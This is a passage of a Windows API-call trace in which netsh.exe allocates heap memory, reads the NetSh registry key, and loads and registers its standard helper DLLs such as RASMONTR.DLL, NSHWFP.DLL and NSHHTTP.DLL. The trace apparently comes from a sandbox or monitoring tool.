(HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427aa0 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427ab0 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427ac0 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427ad0 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427ae0 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427af0 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427b00 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427b10 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427b20 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427b30 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427b40 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427b50 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427b60 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427b70 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427b80 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427b90 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427ba0 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427bb0 [0082.102] GetProcessHeap () returned 0x410000 [0082.102] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427bc0 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427bd0 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427be0 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427bf0 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427c00 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427c10 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427c20 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427c30 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427c40 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427c50 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427c60 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427c70 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427c80 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427c90 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427ca0 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427cb0 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427cc0 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427cd0 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427ce0 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427cf0 [0082.103] GetProcessHeap () returned 0x410000 [0082.103] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427d20 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427d30 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427d40 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427d50 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427d60 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427d70 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427d80 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427d90 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427da0 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427db0 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427dc0 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427dd0 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427de0 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x427df0 [0082.104] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0082.104] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0082.104] GetProcessHeap () returned 0x410000 [0082.104] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x428108 [0082.105] GetProcessHeap () returned 0x410000 [0082.105] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2) returned 0x427e00 [0082.105] GetProcessHeap () returned 0x410000 [0082.105] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x428128 [0082.105] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0082.105] GetProcessHeap () returned 0x410000 [0082.105] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0082.105] GetProcessHeap () returned 0x410000 [0082.105] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x48) returned 0x428148 [0082.105] GetProcessHeap () returned 0x410000 [0082.105] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0082.105] GetProcessHeap () returned 0x410000 [0082.105] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x428198 [0082.105] GetProcessHeap () returned 0x410000 [0082.105] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428148 | out: hHeap=0x410000) returned 1 [0082.105] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x3d77e4 | out: phkResult=0x3d77e4*=0xac) returned 0x0 [0082.105] RegQueryInfoKeyW (in: hKey=0xac, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x3d77dc, lpcbMaxValueNameLen=0x3d77d0, lpcbMaxValueLen=0x3d77d4, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x3d77dc*=0x12, lpcbMaxValueNameLen=0x3d77d0, lpcbMaxValueLen=0x3d77d4, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0082.105] GetProcessHeap () returned 0x410000 [0082.105] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x16) returned 0x428148 [0082.105] GetProcessHeap () returned 0x410000 [0082.105] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x23) returned 0x428168 [0082.105] RegEnumValueW (in: hKey=0xac, dwIndex=0x0, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="4", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0082.105] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0082.105] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0082.105] GetProcessHeap () returned 0x410000 [0082.105] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x428230 [0082.106] GetProcessHeap () returned 0x410000 [0082.106] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4) returned 0x427e10 [0082.106] GetProcessHeap () returned 0x410000 [0082.106] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a) returned 0x426108 [0082.106] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0082.106] GetProcessHeap () returned 0x410000 [0082.106] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428108 | out: hHeap=0x410000) returned 1 [0082.106] LoadLibraryW (lpLibFileName="RASMONTR.DLL") returned 0x74650000 [0089.122] LoadLibraryA (lpLibFileName=0x71d80bac) returned 0x76f90000 [0089.122] GetVersion () returned 0x1db10106 [0089.122] SetErrorMode (uMode=0x0) returned 0x0 [0089.122] SetErrorMode (uMode=0x8001) returned 0x0 [0089.123] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x429128 [0089.124] GetVersion () returned 0x1db10106 [0089.124] GlobalLock (hMem=0x510004) returned 0x429128 [0089.124] LocalAlloc (uFlags=0x40, uBytes=0x178) returned 0x429238 [0089.125] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x4288e8 [0089.125] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0x427e20 [0089.125] malloc (_Size=0x80) returned 0x693f08 [0089.125] __dllonexit () returned 0x71d947bb [0089.125] __dllonexit () returned 0x71d947ca [0089.125] __dllonexit () returned 0x71d947d9 [0089.125] __dllonexit () returned 0x71d947e8 [0089.125] __dllonexit () returned 0x71d949d1 [0089.125] __dllonexit () returned 0x71d94666 [0089.125] __dllonexit () returned 0x71d94a8d [0089.126] __dllonexit () returned 0x71d946cb [0089.126] __dllonexit () returned 0x71d94707 [0089.126] __dllonexit () returned 0x71d94716 [0089.126] __dllonexit () returned 0x71d94725 [0089.126] __dllonexit () returned 0x71d94b36 [0089.126] __dllonexit () returned 0x71d946da [0089.126] __dllonexit () returned 0x71d94833 [0089.126] __dllonexit () returned 0x71d946e9 [0089.126] __dllonexit () returned 0x71d94734 [0089.126] __dllonexit () returned 0x71d94743 [0089.127] __dllonexit () returned 0x71d94752 [0089.127] __dllonexit () returned 0x71d94761 [0089.127] __dllonexit () returned 0x71d94770 [0089.127] __dllonexit () returned 0x71d9477f [0089.127] __dllonexit () returned 0x71d9478e [0089.127] __dllonexit () returned 0x71d9479d [0089.128] __dllonexit () returned 0x71d94cae [0089.128] __dllonexit () returned 0x71d948e2 [0089.128] __dllonexit () returned 0x71d94999 [0089.128] __dllonexit () returned 0x71d949b5 [0089.129] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc0fc [0089.130] __dllonexit () returned 0x71d947f7 [0089.130] __dllonexit () returned 0x71d94806 [0089.130] __dllonexit () returned 0x71d94815 [0089.130] __dllonexit () returned 0x71d94824 [0089.131] GetVersion () returned 0x1db10106 [0089.131] GetVersion () returned 0x1db10106 [0089.131] GetVersion () returned 0x1db10106 [0089.131] __dllonexit () returned 0x71d94d35 [0089.131] __dllonexit () returned 0x71d945d2 [0089.131] __dllonexit () returned 0x71d946f8 [0089.132] __dllonexit () returned 0x71d94ae3 [0089.132] __dllonexit () returned 0x71d94aff [0089.132] __dllonexit () returned 0x71d945ec [0089.132] GetVersion () returned 0x1db10106 [0089.132] GetProcessVersion (ProcessId=0x0) returned 0x60001 [0089.132] GetSystemMetrics (nIndex=11) returned 32 [0089.132] GetSystemMetrics (nIndex=12) returned 32 [0089.132] GetSystemMetrics (nIndex=2) returned 17 [0089.132] GetSystemMetrics (nIndex=3) returned 17 [0089.132] GetDC (hWnd=0x0) returned 0xb010a18 [0089.328] GetDeviceCaps (hdc=0xb010a18, index=88) returned 96 [0089.328] GetDeviceCaps (hdc=0xb010a18, index=90) returned 96 [0089.328] ReleaseDC (hWnd=0x0, hDC=0xb010a18) returned 1 [0089.341] GetSysColor (nIndex=15) returned 0xf0f0f0 [0089.341] GetSysColor (nIndex=16) returned 0xa0a0a0 [0089.341] GetSysColor (nIndex=20) returned 0xffffff [0089.341] GetSysColor (nIndex=18) returned 0x0 [0089.341] GetSysColor (nIndex=6) returned 0x646464 [0089.341] GetSysColorBrush (nIndex=15) returned 0x1100059 [0089.341] GetSysColorBrush (nIndex=6) returned 0x1100061 [0089.341] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0089.347] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0089.384] __dllonexit () returned 0x71d94b1b [0089.384] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0089.384] __dllonexit () returned 0x71d945fc [0089.384] RegisterClipboardFormatW (lpszFormat="Native") returned 0xc004 [0089.384] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0089.384] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0089.384] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0089.384] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0089.384] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0089.384] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0089.384] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0089.384] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0089.384] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0089.384] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc0b1 [0089.384] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc0b7 [0089.560] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0089.560] __dllonexit () returned 0x71d94842 [0089.560] __dllonexit () returned 0x71d94851 [0089.561] __dllonexit () returned 0x71d94860 [0089.561] __dllonexit () returned 0x71d9486f [0089.561] __dllonexit () returned 0x71d9487e [0089.561] GetCursorPos (in: lpPoint=0x71e70418 | out: lpPoint=0x71e70418*(x=1055, y=491)) returned 1 [0091.044] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x4293b8 [0091.044] LocalReAlloc (hMem=0x427e20, uBytes=0xc, uFlags=0x2) returned 0x428108 [0091.044] GetCurrentThread () returned 0xfffffffe [0091.044] GetCurrentThreadId () returned 0x5b8 [0091.044] __dllonexit () returned 0x71d947ac [0091.044] SetErrorMode (uMode=0x0) returned 0x8001 [0091.044] SetErrorMode (uMode=0x8001) returned 0x0 [0091.045] GetModuleFileNameW (in: hModule=0x71d70000, lpFilename=0x3d6e8c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\MFC42u.dll" (normalized: "c:\\windows\\syswow64\\mfc42u.dll")) returned 0x1e [0091.045] wcscpy_s (in: _Destination=0x3d7094, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0091.045] FindResourceW (hModule=0x71d70000, lpName=0xe01, lpType=0x6) returned 0x2109b0 [0091.243] LoadStringW (in: hInstance=0x71d70000, uID=0xe000, lpBuffer=0x3d6c8c, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0091.244] wcscpy_s (in: _Destination=0x3d6ec0, _SizeInWords=0x5, _Source=".HLP" | out: _Destination=".HLP") returned 0x0 [0091.244] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0091.244] malloc (_Size=0x40) returned 0x693f88 [0091.244] LocalAlloc (uFlags=0x40, uBytes=0x2090) returned 0x429448 [0091.244] GetSystemDirectoryA (in: lpBuffer=0x3d72d8, uSize=0x112 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0091.244] strcat_s (in: _Destination="C:\\Windows\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\Windows\\system32\\MFC42") returned 0x0 [0091.244] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\Windows\\system32\\MFC42LOC") returned 0x0 [0091.245] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\Windows\\system32\\MFC42LOC.DLL") returned 0x0 [0091.245] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0091.245] GetProcAddress (hModule=0x74650000, lpProcName="InitHelperDll") returned 0x74666cb9 [0091.247] InitHelperDll () returned 0x0 [0091.247] RegisterHelper () returned 0x0 [0091.247] GetProcessHeap () returned 0x410000 [0091.247] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd8) returned 0x42bce0 [0091.247] GetProcessHeap () returned 0x410000 [0091.247] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428198 | out: hHeap=0x410000) returned 1 [0091.247] RegisterHelper () returned 0x0 [0091.247] GetProcessHeap () returned 0x410000 [0091.247] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x42bdc0 [0091.247] GetProcessHeap () returned 0x410000 [0091.247] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42bce0 | out: hHeap=0x410000) returned 1 [0091.247] RegisterHelper () returned 0x0 [0091.248] GetProcessHeap () returned 0x410000 [0091.248] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x168) returned 0x42bee8 [0091.248] GetProcessHeap () returned 0x410000 [0091.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42bdc0 | out: hHeap=0x410000) returned 1 [0091.248] RegisterHelper () returned 0x0 [0091.248] GetProcessHeap () returned 0x410000 [0091.248] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1b0) returned 0x42bce0 [0091.248] GetProcessHeap () returned 0x410000 [0091.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42bee8 | out: hHeap=0x410000) returned 1 [0091.248] RegisterHelper () returned 0x0 [0091.248] GetProcessHeap () returned 0x410000 [0091.248] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1f8) returned 0x42be98 [0091.248] GetProcessHeap () returned 0x410000 [0091.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42bce0 | out: hHeap=0x410000) returned 1 [0091.248] RegEnumValueW (in: hKey=0xac, dwIndex=0x1, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="nshwfp", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0091.248] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0091.248] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0091.248] GetProcessHeap () returned 0x410000 [0091.248] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3c) returned 0x424e70 [0091.248] GetProcessHeap () returned 0x410000 [0091.248] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe) returned 0x428900 [0091.248] GetProcessHeap () returned 0x410000 [0091.248] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16) returned 0x428198 [0091.248] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0091.248] GetProcessHeap () returned 0x410000 [0091.248] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428230 | out: hHeap=0x410000) returned 1 [0091.248] LoadLibraryW (lpLibFileName="NSHWFP.DLL") returned 0x71af0000 [0092.536] GetProcAddress (hModule=0x71af0000, lpProcName="InitHelperDll") returned 0x71b4bbb2 [0092.536] InitHelperDll () returned 0x0 [0092.536] RegisterHelper () returned 0x0 [0092.536] GetProcessHeap () returned 0x410000 [0092.536] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x240) returned 0x4318a0 [0092.536] GetProcessHeap () returned 0x410000 [0092.536] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42be98 | out: hHeap=0x410000) returned 1 [0092.537] RegEnumValueW (in: hKey=0xac, dwIndex=0x2, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="dhcpclient", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0092.537] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0092.537] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0092.537] GetProcessHeap () returned 0x410000 [0092.537] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x42be98 [0092.537] GetProcessHeap () returned 0x410000 [0092.537] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16) returned 0x428240 [0092.537] GetProcessHeap () returned 0x410000 [0092.537] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x22) returned 0x430ca0 [0092.537] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0092.537] GetProcessHeap () returned 0x410000 [0092.537] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424e70 | out: hHeap=0x410000) returned 1 [0092.537] LoadLibraryW (lpLibFileName="DHCPCMONITOR.DLL") returned 0x71ad0000 [0094.193] GetProcAddress (hModule=0x71ad0000, lpProcName="InitHelperDll") returned 0x71ad1cd4 [0094.193] InitHelperDll () returned 0x0 [0094.193] RegisterHelper () returned 0x0 [0094.193] GetProcessHeap () returned 0x410000 [0094.193] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x288) returned 0x435428 [0094.193] GetProcessHeap () returned 0x410000 [0094.193] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4318a0 | out: hHeap=0x410000) returned 1 [0094.193] RegEnumValueW (in: hKey=0xac, dwIndex=0x3, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="wshelper", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0094.193] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0094.193] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0094.193] GetProcessHeap () returned 0x410000 [0094.193] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x64) returned 0x4318a0 [0094.193] GetProcessHeap () returned 0x410000 [0094.193] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x432d88 [0094.193] GetProcessHeap () returned 0x410000 [0094.193] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a) returned 0x432420 [0094.193] _wcsupr (in: _String="wshelper.dll" | out: _String="WSHELPER.DLL") returned="WSHELPER.DLL" [0094.193] GetProcessHeap () returned 0x410000 [0094.194] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42be98 | out: hHeap=0x410000) returned 1 [0094.194] LoadLibraryW (lpLibFileName="WSHELPER.DLL") returned 0x71a00000 [0094.607] GetProcAddress (hModule=0x71a00000, lpProcName="InitHelperDll") returned 0x71a0157b [0094.607] InitHelperDll () returned 0x0 [0094.622] RegisterHelper () returned 0x0 [0094.622] GetProcessHeap () returned 0x410000 [0094.622] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2d0) returned 0x436848 [0094.622] GetProcessHeap () returned 0x410000 [0094.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x435428 | out: hHeap=0x410000) returned 1 [0094.622] RegEnumValueW (in: hKey=0xac, dwIndex=0x4, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="nshhttp", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0094.622] _wcsicmp (_String1="nshhttp.dll", _String2="ipxmontr.dll") returned 5 [0094.622] _wcsicmp (_String1="nshhttp.dll", _String2="ipxpromn.dll") returned 5 [0094.622] GetProcessHeap () returned 0x410000 [0094.622] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x78) returned 0x420218 [0094.622] GetProcessHeap () returned 0x410000 [0094.622] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4345d0 [0094.622] GetProcessHeap () returned 0x410000 [0094.622] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x432dc8 [0094.622] _wcsupr (in: _String="nshhttp.dll" | out: _String="NSHHTTP.DLL") returned="NSHHTTP.DLL" [0094.622] GetProcessHeap () returned 0x410000 [0094.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4318a0 | out: hHeap=0x410000) returned 1 [0094.622] LoadLibraryW (lpLibFileName="NSHHTTP.DLL") returned 0x719a0000 [0094.828] GetProcAddress (hModule=0x719a0000, lpProcName="InitHelperDll") returned 0x719a1b47 [0094.828] InitHelperDll () returned 0x0 [0094.828] RegisterHelper () returned 0x0 [0094.828] GetProcessHeap () returned 0x410000 [0094.828] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x318) returned 0x437320 [0094.828] GetProcessHeap () returned 0x410000 [0094.828] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x436848 | out: hHeap=0x410000) returned 1 [0094.828] RegEnumValueW (in: hKey=0xac, dwIndex=0x5, lpValueName=0x428148, lpcchValueName=0x3d77c8, lpReserved=0x0, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc | out: lpValueName="fwcfg", lpcchValueName=0x3d77c8, lpType=0x0, lpData=0x428168, lpcbData=0x3d77cc) returned 0x0 [0094.828] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0094.828] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0094.828] GetProcessHeap () returned 